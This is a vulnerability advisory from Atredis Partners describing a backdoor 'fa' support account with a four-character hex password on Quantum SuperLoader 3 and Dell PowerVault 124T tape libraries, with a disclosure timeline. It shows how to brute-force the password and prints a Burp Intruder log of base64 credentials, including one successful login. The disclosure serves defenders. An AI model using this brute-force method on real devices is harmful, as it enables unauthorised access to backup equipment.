Skip to content

Latest commit

 

History

History
76 lines (47 loc) · 2.26 KB

ATREDIS-2019-0005.md

File metadata and controls

76 lines (47 loc) · 2.26 KB
Raw

Quantum SuperLoader - Backdoor Support Account Access

Vendors

  • Quantum Corporation
  • Dell Inc.

Affected Products

  • Quantum SuperLoader 3 (V94.0 005E.0h)
  • Dell PowerVault 124T

Other products and versions may also be affected.

Summary

The Quantum SuperLoader 3 and Dell PowerVault 124T devices can be accessed using a backdoor support account ("fa") that has a four-character password. The password can be provided by vendor support and is based on a five-digit challenge code displayed in the telnet banner, HTTP authentication realm, and front panel. This four-character password consists of lower case hexadecimal and can be brute forced or derived based on the challenge algorithm.

This issue may affect a wider range of products and firmware versions.

Mitigation

  • No mitigations are known at this time.

Credit

These issues were found by Stephen Breen and HD Moore of Atredis Partners

References

Report Timeline

2019-08-22: Atredis Partners provided a copy of this advisory by email to Quantum Corporation and Dell Inc.

2019-09-10: Quantum confirmed that this support account is undocumented, but may be widely known.

2019-10-08: Atredis Partners provided a copy of this advisory to CERT/CC.

2019-11-05: Dell confirmed that the only affected Dell product is the PowerVault 124T.

2019-11-21: Atredis Partners published this advisory.

Technical Details

The backdoor support password can be guessed using a maximum of 65,536 requests to the web interface. The password range consists of "0000" to "ffff" (0001, 0002, etc).

An example session using Burp Intruder is shown below:

Request,Payload,Status,Error,Timeout,Length,Comment
336,ZmE6ZjQxMA==,200,false,false,25911,
1,ZmE6MDAwMA==,401,false,false,129,
3,ZmE6MjAwMA==,401,false,false,129,
2,ZmE6MTAwMA==,401,false,false,129,
4,ZmE6MzAwMA==,401,false,false,129,
5,ZmE6NDAwMA==,401,false,false,129,
6,ZmE6NTAwMA==,401,false,false,129,
7,ZmE6NjAwMA==,401,false,false,129,
8,ZmE6NzAwMA==,401,false,false,129,
9,ZmE6ODAwMA==,401,false,false,129,
10,ZmE6OTAwMA==,401,false,false,129,
11,ZmE6YTAwMA==,401,false,false,129,
12,ZmE6YjAwMA==,401,false,false,129,
13,ZmE6YzAwMA==,401,false,false,129,